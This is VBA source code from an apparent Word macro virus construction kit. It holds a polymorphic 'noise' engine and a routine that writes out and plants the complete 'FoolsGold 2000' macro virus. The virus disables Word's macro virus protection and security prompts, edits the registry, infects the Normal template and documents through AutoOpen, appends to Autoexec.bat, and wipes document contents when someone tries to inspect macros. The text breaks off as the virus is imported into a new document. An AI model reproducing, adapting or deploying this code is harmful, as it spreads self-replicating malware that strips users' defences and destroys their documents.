' My Noise Generator
' This Generator Contains Code Taken From "VicodinES Macro.Poppy Construction Kit v1.0d"
' Kewl
Sub MacroNoiseEngine()
Randomize
noisechance = Int(Rnd * 6)
select1 = Int(Rnd * 6)
select2 = Int(Rnd * 6)
select3 = Int(Rnd * 6)
select4 = Int(Rnd * 6)
select5 = Int(Rnd * 6)
select6 = Int(Rnd * 6)
encode1 = Int(Rnd * 9999)
encode2 = Int(Rnd * 9999)
encode3 = Int(Rnd * 9999)
crypt1 = Int(Rnd * 9999)
crypt2 = Int(Rnd * 9999)
crypt3 = Int(Rnd * 9999)
noisevar1$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & encode1 + crypt1
noisevar2$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22)))
noisevar3$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & encode3 + crypt3
noisevar4$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22)))
noisevar5$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & encode2 + crypt2
noisevar6$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & encode3 + crypt1
' CheckBox2.Value Selects Noise
If CheckBox2.Value = True Then
If select1 = 1 Then
Print #1, noisevar1$ + " = " + noisevar2 + " & " + noisevar3 + " & Int(Rnd * " & crypt3 & ")"
End If
If select1 = 2 Then
Print #1, noisevar4$ + " = " + noisevar5 + " & " + noisevar6
End If
If select1 = 3 Then
Print #1, noisevar1$ + " = " + noisevar2 + " & " + noisevar3 + " & Int(Rnd * " & crypt1 & ")"
End If
If select1 = 4 Then
Print #1, noisevar4$ + " = " + noisevar5 + " & " + noisevar6
End If
If select1 = 5 Then
Print #1, noisevar1$ + " = " + noisevar2 + " & " + noisevar3 + " & " + noisevar4 + " & " + noisevar5
End If
If select1 = 6 Then
Print #1, noisevar4$ + " = " + noisevar5 + " & " + noisevar6 + " & " + noisevar2 + " & " + noisevar3
End If
End If
End Sub
Attribute VB_Name = "WMVGAbout"
Attribute VB_Base = "0{E19B3AE8-5287-4688-A582-584F66D7A7EC}{DFEAECAE-5D28-4ED2-B55F-F3EAB00AF858}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
WMVGAbout.Hide
WMVG.Show
End Sub
Private Sub Label2_Click()
WMVGSecretFrm4.Show
End Sub
Private Sub UserForm_Click()
End Sub
Attribute VB_Name = "WMVGExit"
Attribute VB_Base = "0{FB5D81A3-580B-4A05-9C7B-8D9C91CA8092}{3454F95F-5C7E-47D6-A233-538DDF74A9BE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
Oldtimer = Timer
While (Timer < Oldtimer + 3)
Wend
End Sub
Private Sub UserForm_Click()
WMVGExit.Hide
Application.Quit
End Sub
Attribute VB_Name = "WMVGExtras"
Attribute VB_Base = "0{1C5DFE43-17D0-4160-9667-100AE63799A2}{34EB5D5D-707A-4A60-9487-02795945932B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Drop FoolsGold Virus
Private Sub CommandButton1_Click()
On Error Resume Next
' Open source file for construction
Open "C:\My Documents\FoolsGold.bas" For Output As #1
Print #1, "Attribute VB_Name = ""Fool"""
Print #1, ""
Print #1, "Sub AutoOpen()"
Print #1, "'FoolsGold 2000 Virus vWMVG"
Print #1, "'The WaLRuS 09/00"
Print #1, "On Error Resume Next"
Print #1, "Options.ConfirmConversions = False"
Print #1, "Options.VirusProtection = False"
Print #1, "Options.SaveNormalPrompt = False"
Print #1, "CommandBars(""Macro"").Controls(""Security..."").Enabled = False"
Print #1, "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&"
Print #1, "ActiveDocument.ReadOnlyRecommended = False"
Print #1, "If (Second(Now()) > 50) Then System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"", ""RegisteredOwner"") = ""The WaLRuS"""
Print #1, "If Day(Now) = 31 Then Call Payload"
Print #1, "Set Norm = NormalTemplate.VBProject.VBComponents"
Print #1, "Set Doc = ActiveDocument.VBProject.VBComponents"
Print #1, "If Norm.Item(""Fool"").Name <> ""Fool"" Then"
Print #1, "Doc(""Fool"").Export ""c:\Fool.drv"""
Print #1, "Set infect = NormalTemplate.VBProject"
Print #1, "ElseIf Doc.Item(""Fool"").Name <> ""Fool"" Then"
Print #1, "Norm(""Fool"").Export ""c:\Fool.drv"""
Print #1, "Set infect = ActiveDocument.VBProject"
Print #1, "End If"
Print #1, "infect.VBComponents.Import (""c:\Fool.drv"")"
Print #1, "Kill (""c:\Fool.drv"")"
Print #1, "ActiveDocument.Save"
Print #1, "End Sub"
Print #1, ""
Print #1, "Sub HelpAbout()"
Print #1, "On Error Resume Next"
Print #1, "Call Payload"
Print #1, "End Sub"
Print #1, ""
Print #1, "Sub Payload()"
Print #1, "On Error Resume Next"
Print #1, "MsgBox ""FoolsGold 2000 by The WaLRuS "", vbInformation"""
Print #1, "Assistant.Visible = True"
Print #1, "With Assistant.NewBalloon"
Print #1, ".Icon = msoIconAlert"
Print #1, ".Text = ""FoolsGold 2000 Thanks You!"""
Print #1, ".Heading = ""GREETINGS"""
Print #1, "End With"
Print #1, "SetAttr ""C:\Autoexec.bat"", 0"
Print #1, "Open ""C:\Autoexec.bat"" For Append As #1"
Print #1, "Print #1, ""CLS"""
Print #1, "Print #1, ""ECHO ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ·"""
Print #1, "Print #1, ""ECHO º ***************************************** º"""
Print #1, "Print #1, ""ECHO º * FoolsGold 2000 Virus by The WaLRuS * º"""
Print #1, "Print #1, ""ECHO º ***************************************** º"""
Print #1, "Print #1, ""ECHO º The Fools Gold Virus wishes to thank the º"""
Print #1, "Print #1, ""ECHO º user of this computer because you have º"""
Print #1, "Print #1, ""ECHO º helped to spread the good words of peace! º"""
Print #1, "Print #1, ""ECHO º WaLRuS º"""
Print #1, "Print #1, ""ECHO ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ"""
Print #1, "Close #1"
Print #1, "Finish:"
Print #1, "End Sub"
Print #1, ""
Print #1, "Sub ToolsMacro()"
Print #1, "On Error Resume Next"
Print #1, "Call Stealthy"
Print #1, "End Sub"
Print #1, "Sub FileTemplates()"
Print #1, "On Error Resume Next"
Print #1, "Call Stealthy"
Print #1, "End Sub"
Print #1, "Sub ViewVBCode()"
Print #1, "On Error Resume Next"
Print #1, "Call Stealthy"
Print #1, "End Sub"
Print #1, "Sub Stealthy()"
Print #1, "On Error Resume Next"
Print #1, "Selection.WholeStory"
Print #1, "Selection.Delete Unit:=wdCharacter, Count:=1"
Print #1, "ActiveDocument.Save"
Print #1, "Call Payload"
Print #1, "End Sub"
Close #1
' Open document and then infect it, save it and close it
Documents.Add Template:=NormalTemplate.FullName, NewTemplate:=False
ActiveDocument.VBProject.VBComponents.Import ("C:\My Documents\FoolsGold.bas")
…